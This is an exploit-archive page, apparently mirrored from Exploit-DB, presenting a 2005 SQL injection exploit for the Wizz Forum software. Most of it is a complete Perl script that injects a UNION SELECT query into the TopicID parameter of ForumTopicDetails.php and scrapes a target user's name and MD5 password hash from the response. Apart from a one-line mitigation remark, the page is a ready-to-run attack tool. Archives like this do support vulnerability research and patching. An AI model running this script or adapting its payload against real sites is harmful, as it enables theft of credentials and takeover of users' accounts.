header-logo
Suggest Exploit
vendor:
Wizz Forum
by:
HACKERS PAL
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Wizz Forum
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Wizz Forum SQL Injection Exploit

This exploit allows an attacker to gain access to the Wizz Forum by exploiting a SQL injection vulnerability. The exploit takes the full path of the forum and the user ID as arguments and retrieves the user name and MD5 hash of the password.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#!/bin/env perl
#//-----------------------------------------------------------#
#//        Wizz Forum SQL Injection Exploit .. By HACKERS PAL
#//                   Greets For Devil-00 - Abducter - Almaster
#//                          http://WwW.SoQoR.NeT
#//-----------------------------------------------------------#

use LWP::Simple;

print "\n#####################################################";
print "\n#        Wizz Forum Exploit By : HACKERS PAL        #";
print "\n#               Http://WwW.SoQoR.NeT                #";

if(!$ARGV[0] or !$ARGV[1]) {
print "\n# -- Usage:                                         #";
print "\n# -- perl $0 [Full-Path] [User ID]              #";
print "\n# -- Example:                                       #";
print "\n# -- perl $0 http://vubb.com/forum/1            #";
print "\n#     Greets To Devil-00 - Abducter - almastar      #";
print "\n#####################################################";
   exit(0);
}
else
{
print "\n#     Greets To Devil-00 - Abducter - almastar      #";
print "\n#####################################################";

       $web=$ARGV[0];
       $id=$ARGV[1];
$url = "ForumTopicDetails.php?TopicID=-10%20union%20select%20userid,password,password,userid,joindate,4444444,4444444%20from%20ForumUser%20where%20user_index=$id";
           $site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
print "\n[+] Connected to: $ARGV[0]\n";

print "[+] User ID is : $id ";
$page =~ m/<td width='100%' colspan='3'><font face='Arial' size='2'>(.*?)<\/font><\/td>/ && print "\n[+] User Name is: $1\n";
print "\n[-] Unable to retrieve User Name\n" if(!$1);
$page =~ m/<font face='Arial' size='4'>Topic: (.*?)<\/font>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

}

# Finished

# milw0rm.com [2005-11-14]

Navigation

Suggest Exploit

Services By CQR